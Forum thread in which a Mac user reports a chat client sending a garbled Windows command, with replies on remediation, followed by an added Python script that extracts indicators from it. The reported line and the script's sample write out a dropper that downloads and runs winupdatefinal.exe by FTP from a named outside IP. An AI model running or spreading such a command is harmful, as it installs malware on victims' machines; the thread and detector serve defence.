  #1 (permalink)  
Old 10-07-2008, 08:05 PM
pipesound
[PANIC] Possible Security Breach

So earlier this morning I was watching TV while my MacBook Pro was up and running in my bedroom. When I got back to it a classmate was messaging me through Adium, and to my surprise I WAS AUTOMATICALLY ANSWERING him. Well, not quite answering, but there were 3 lines "I wrote" to him; they were as follows:

%systemroot%çsystem32çcmd.exe

del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq /echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'sÑeq /winupdatefinal.exe /del eq

j

For your consideration, my active sharing services were:
screen sharing
file sharing
web sharing
ssh
bluetooth sharing

Also, I have noticed that since yesterday Spotlight has gone insane indexing my hard drives, but I hardly think it's related to this "attack".

Question is: am I in danger?
I'd appreciate some clues on what's going on with my Mac.
Thanks in advance,
  #2 (permalink)  
Old 02-05-2009, 05:21 AM
Napoleon

I think it's safe to say that this is the result of someone gaining access to your system, either via screen sharing or iChat. Are you on a wireless network? What's your encryption? If it's WPA2, great, but are you allowing guest access and is your password more than 10 characters?

I would immediately disconnect from whatever network you're on, turn AirPort OFF, and run Disk Utility from Finder/Applications/Utilities/Disk Utility, choosing Macintosh HD from the left column, then click Repair Disk.
After that, I would delete all preferred networks, and change your network access information from either AirPort Utility if you have an Apple router, or from your router's software if it's 3rd party!

This is not something I have ever seen happen as a result of the OS itself acting up. Sorry and good luck!
  #3 (permalink)  
Old 02-07-2009, 12:27 AM
JayBird

Sounds like a s/breach. Have you checked the IP against WHOIS: Whois record for 201.75.69.44 - it's an IP in Brazil. The port it is using is used by many P2P apps such as LIMEWIRE.

When searching Google for the EXE you mentioned: it IS LINKED TO A VIRUS:

winupdate.exe problem - Viruses, Spyware and other Nasties

You can normally tell if a virus is present: it will masquerade as a normal file.
__________________
I Do Not Condone Piracy, If You Like It BUY IT! - It's Ok To Test But Not Steal - MacBook Pro Owner

iPhone Owner 3G
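
An added example, not part of any post in this thread: a small Python triage helper that pulls the FTP host, port and file name out of a message shaped like the one quoted in the first post, so those values can be searched for in firewall or proxy logs. The function name `triage` and its matching rules are assumptions of this example.

```python
import re
from ipaddress import ip_address

# Line copied from the first post, exactly as it appeared in the Adium window.
SAMPLE = ("del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq "
          "/echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'sÑeq "
          "/winupdatefinal.exe /del eq")

# FTP client commands written out one `echo` at a time.
ECHO_CMD = re.compile(r"echo\s+(open|user|get|quit)\b([^:&|/]*)", re.I)
# A standalone `ftp` invocation (not part of a longer word or file name).
FTP_RUN = re.compile(r"(?<![\w.])ftp(?:\.exe)?\s", re.I)


def triage(message: str) -> dict:
    """Extract FTP staging indicators from a chat message, if present."""
    finding = {"host": None, "port": None, "payload": None, "steps": []}
    for verb, rest in ECHO_CMD.findall(message):
        verb, args = verb.lower(), rest.split()
        finding["steps"].append(verb)
        if verb == "open" and args:
            try:
                finding["host"] = str(ip_address(args[0]))
            except ValueError:
                finding["host"] = args[0]  # hostname rather than a literal IP
            if len(args) > 1 and args[1].isdigit():
                finding["port"] = int(args[1])
        elif verb == "get" and args:
            finding["payload"] = args[0]
    runs_ftp = bool(FTP_RUN.search(message))
    # Flag only when a file is fetched AND the ftp client is invoked,
    # so ordinary chat that merely mentions "ftp" is not reported.
    finding["suspicious"] = (runs_ftp and "open" in finding["steps"]
                             and "get" in finding["steps"])
    return finding


if __name__ == "__main__":
    print(triage(SAMPLE))
```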
All times are GMT +2. The time now is 08:04 AM.


